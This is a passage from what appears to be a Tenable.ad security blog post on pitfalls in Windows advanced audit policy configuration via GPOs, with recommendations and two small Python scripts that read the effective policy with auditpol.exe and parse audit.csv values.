As we saw previously, as soon as we enable even just one advanced audit policy setting the system entirely switches to the advanced mode. The question we may have now is how does the system manage the other settings that we did not specify? There are certainly sensible default values, aren’t there? These default values are described in the documentation of each audit policy setting. Let’s read the explanation of the “Audit Logon” setting:

So, here on a server I should expect a default value of “Success, Failure” for the “Audit Logon” setting if not configured, shouldn’t I? Well, we may have a surprise here.

Here is the configuration I applied on my server: I enabled “Success” logging for “Audit Account Lockout” and left “Audit Logon” as “Not Configured”:

However, when looking at the resulting audit policy I notice that “Logon” events are not audited, contrary to their default:

We knew we should not rely on defaults… but this one is really surprising. Of course we made sure that there was no other GPO defining any audit policy setting.

➡️ Tenable.ad recommendation: do not rely on default values for Advanced audit policy settings: explicitly configure the desired value (No Auditing, Success, Failure, or Success and Failure) for each setting of interest.

Be even more careful when migrating from a basic audit policy: make sure to export the resulting policy you had on a normal machine, and convert it to all the appropriate advanced settings to prevent any regression in logging. And as usual with GPOs, especially for security settings, aim to create a single security GPO linked as high as possible, instead of spreading those settings across many lower-level GPOs.

Surprise #4 — Settings defined by GPOs are not merged

What happens when a machine is covered by several GPOs which define audit policy settings? What if one GPO enables “Success” auditing while another enables “Failure” auditing, is there a merge and would we obtain “Success and Failure”?

Answer: there is no merge at the setting level, and only the value of the GPO with the highest priority is applied. This is actually coherent with the way the Group Policy engine usually works, so not really a surprise, but still to keep in mind.

Here is a demonstration where we want to configure auditing on domain controllers. Two GPOs apply to those servers:

“Default Domain Policy” linked at the top of the Active Directory domain

  • “Audit Account Lockout” is set to “Success and Failure” (yellow highlighting)
  • “Audit Logon” is set to “Success” (red highlighting)

“Default Domain Controllers Policy” linked to the “Domain Controllers” organizational unit

  • “Audit Logoff” is set to “Success and Failure” (blue highlighting)
  • “Audit Logon” is set to “Failure” (red highlighting)

Now let’s see the resulting audit policy:

We notice that the conflicting values for “Logon” (red highlighting) were not merged; instead, the value from the “Default Domain Controllers Policy” applies. This GPO won as per the usual GPO precedence rules.

We also observe that the values for “Logoff” (blue highlighting) from the “Default Domain Controllers Policy” and “Account Lockout” (yellow highlighting) from the “Default Domain Policy” are both properly applied because those were not in conflict.

Here is how Microsoft Advanced security auditing FAQ explains it:

By default, policy options that are set in GPOs and linked to higher levels of Active Directory sites, domains, and OUs are inherited by all OUs at lower levels. However, an inherited policy can be overridden by a GPO that is linked at a lower level.

You can also read more about GPO Processing Order in the [MS-GPOL] specification.

➡️ Tenable.ad recommendation: keep in mind that conflicting audit settings are not merged.
If you want to define a domain-wide security auditing GPO, you should ensure that no other GPO at a lower OU level overrides its settings. If necessary, you can set this domain-wide GPO as “Enforced”, even if this is not our preferred option as it can become confusing when managing a large set of GPOs.

If you are only concerned about auditing on domain controllers, you can link a GPO to the “Domain Controllers” organizational unit, as long as there is no domain-level “Enforced” GPO overriding audit policy settings.

Surprise #5 — Only one tool properly shows the effective audit policy

We have just shown that we can have many surprises when configuring auditing, so we really would like a way to see the effective audit policy on a system to confirm that it is as expected.

We could be tempted to use tools which compute the result of GPOs (RSoP), but…

For example, “rsop.msc” does not even seem to support advanced audit policy, which is not too surprising since it is deprecated! See how this section is used in the GPO editor on the right-hand side whereas it is missing in “rsop.msc” on the left-hand side:

And with “gpresult.exe”, if we have basic and advanced audit policies, we will see both: which one applies?

And what about settings that might have been configured locally and not through a GPO (which is not advised…)?

The only supported tool which can properly read the current effective audit policy is “auditpol.exe”, as you may have guessed from our previous screenshots. This is confirmed by a Microsoft blog post. For those who want to dig deeper: “auditpol.exe” calls AuditQuerySystemPolicy, which finally calls the “LsarQueryAuditPolicy” RPC in LSASS.

➡️ Tenable.ad recommendation: only trust the following command to see the effective audit policy on machines: “auditpol.exe /get /category:*”
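
If you want to check this at scale, the same command can be wrapped in a short script. The sketch below shells out to auditpol.exe and flags subcategories reported as “No Auditing”; the output parsing is deliberately naive and assumes an English-locale output format.

import subprocess

def not_audited_subcategories():
    # auditpol.exe is the only supported way to read the effective audit policy
    out = subprocess.run(
        ["auditpol.exe", "/get", "/category:*"],
        capture_output=True, text=True, check=True
    ).stdout
    findings = []
    for line in out.splitlines():
        line = line.rstrip()
        # Naive parse: subcategory lines end with their configured setting
        if line.endswith("No Auditing"):
            findings.append(line.strip())
    return findings

if __name__ == "__main__":
    for entry in not_audited_subcategories():
        print("Not audited:", entry)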

Surprise bonus — Confusions in the specification

Configuring advanced audit policy in a GPO creates an “audit.csv” file which is described in the [MS-GPAC] Microsoft open specification. We found a mistake in one of the examples:

Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting,Setting Value
TEST-MACHINE,System,IPsec Driver,{0CCE9213-69AE-11D9-BED3-505054503030},No Auditing,,0
TEST-MACHINE,System,System Integrity,{0CCE9212-69AE-11D9-BED3-505054503030},Success,,1
TEST-MACHINE,System,IPsec Extended Mode,{0CCE921A-69AE-11D9-BED3-505054503030},Success and Failure,,3
TEST-MACHINE,System,File System,{0CCE921D-69AE-11D9-BED3-505054503030},Not specified,,0

In the right-hand columns we have the setting name (such as “No Auditing”, “Success”, etc.) and the corresponding numerical value (0, 1, 3…). We can see that, according to the first and last lines, the value “0” is associated with both “No Auditing” and “Not specified”, which does not make sense. Fortunately, the text value is ignored: “value of InclusionSetting is for user readability only and is ignored when the advanced audit policy is applied”.

Also, we found the specification a bit confusing regarding the values of “0” and “4”:

A value of “0”: Indicates that this audit subcategory setting is unchanged.
A value of “4”: Indicates that this audit subcategory setting is set to None.

Our observations actually show that:

  • A value of “0” means that auditing is “disabled”, which corresponds to this in the graphical editor:
  • A value of “4” means that auditing is “not specified”, and thus the default value should apply (except when it does not, as shown before), which would correspond to this in the graphical editor (except that in this case the editor does not even generate a line for this setting in “audit.csv”):
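
If you need to review your own GPOs, the numeric Setting Value column is the one that matters, since the text column is ignored. The sketch below parses an audit.csv using the meanings observed in this section; mapping 2 to “Failure” is an inference from the bit-flag pattern (1 = Success, 3 = Success and Failure) rather than something taken from the specification.

import csv

# Observed / inferred meanings of the "Setting Value" column in audit.csv
SETTING_VALUES = {
    0: "No Auditing (explicitly disabled)",
    1: "Success",
    2: "Failure (inferred from the bit-flag pattern)",
    3: "Success and Failure",
    4: "Not specified (the default is supposed to apply)",
}

def summarize_audit_csv(path):
    with open(path, newline="", encoding="utf-8-sig") as f:
        for row in csv.DictReader(f):
            value = int(row["Setting Value"])
            print(f'{row["Subcategory"]}: {SETTING_VALUES.get(value, "unknown value")}')

if __name__ == "__main__":
    summarize_audit_csv("audit.csv")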

